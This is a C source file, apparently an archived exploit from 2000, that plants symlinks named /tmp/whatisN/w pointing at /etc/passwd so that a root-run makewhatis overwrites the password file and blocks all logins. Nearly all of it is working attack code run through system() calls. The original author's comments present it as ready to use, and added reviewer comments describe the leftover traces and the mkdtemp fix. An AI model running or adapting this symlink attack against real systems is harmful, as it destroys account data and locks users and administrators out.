makewhatis local DoS exploit (symlink attack via predictable /tmp paths) - /etc/passwd is overwritten as soon as makewhatis runs, usually from cron.
cdb2304ec7442f32b6ef9838ca5f9055ec18ed08472c3e7cab9d1e6986337c97
/* mw-exp.c makewhatis exploit */
/* grazer@hit2000.org <-- mail comments.. */
/* After running this file.. wait (one day on caldera system) */
/* until makewhatis is run again */
/* when it is run, the database will be written to /etc/passwd */
/* making it impossible to log in. */
/* gtx to #hit2000 and #darknet */
/* 15-7-2000 GrAzEr1 */
#include<stdio.h>
/* File the planted symlinks point at. The trailing space is significant:
   the literal is concatenated straight into the "ln -s" command line in
   main() and serves as the separator between link target and link name. */
#define TARGET_FILE "/etc/passwd "
/*
 * Proof-of-concept for a symlink attack on makewhatis via predictable
 * names under /tmp.
 *
 * For each number N from 1 to 101 the program shells out to run
 *     mkdir /tmp/whatisN
 *     ln -s /etc/passwd /tmp/whatisN/w
 * and then prints a closing message. It takes no arguments and has no
 * explicit return statement.
 *
 * NOTE(review): presumably the affected makewhatis, when run as root,
 * writes its database to /tmp/whatis<PID>/w and neither refuses a
 * pre-existing directory nor checks whether "w" is a symlink. That is
 * inferred from the paths built here and from the file header; confirm
 * against the makewhatis script in question.
 *
 * Defender view:
 *  - Artefacts left behind: a run of /tmp/whatisN directories, each holding
 *    a symlink named "w" whose target is /etc/passwd.
 *  - The fix belongs in makewhatis: create the working directory atomically
 *    under an unpredictable name (mktemp -d, or mkdtemp(3) in C) and abort
 *    if creation fails, rather than reusing a path another user could have
 *    prepared in advance.
 */
main()
{
/* Scratch buffers: cmd holds the mkdir command, cmd2 the ln -s command,
   temp the decimal text of the current number. The longest string built
   below is far shorter than 102 bytes. */
char cmd[102], temp[102], cmd2[102];
/* Fixed fragments the two command lines are assembled from. */
char *mkdir = "mkdir /tmp/whatis", *w = "w", *slash = "/";
char *symlink = "ln -s ", *whatis = "/tmp/whatis";
/* scores[i] is only ever set to i and read back for sprintf below. */
int scores[102];
int i = 0;
while(i<=100) /* define the range of the process id here,
there might be a lot directories needed
to let this sploit work. (advise : 10000 ? ) */
{
/* i is incremented before use, so the body sees 1..101; index 101 is the
   last valid slot of scores[102] and scores[0] is never written. */
i++;
scores[i]=i;
/* Start both command strings afresh on every iteration. */
strcpy(cmd, mkdir);
strcpy(cmd2, symlink);
sprintf(temp,"%d",scores[i]);
/* cmd  -> "mkdir /tmp/whatisN" */
strcat(cmd, temp);
/* cmd2 -> "ln -s /etc/passwd /tmp/whatisN/w" */
strcat(cmd2, TARGET_FILE);
strcat(cmd2, whatis);
strcat(cmd2, temp);
strcat(cmd2, slash);
strcat(cmd2, w);
/* The progress message is followed at once by a screen clear. */
printf("\n Hold on. Making dirs and symlinks (/tmp) \n");
system("clear");
/* Both commands consist only of the constants above plus a formatted
   integer; nothing from outside the program reaches the shell. Return
   values of system() are not checked. */
system(cmd);
system(cmd2);
}
printf (" Now sit back and relax until makewhatis is ran again.. :-)
\n");
}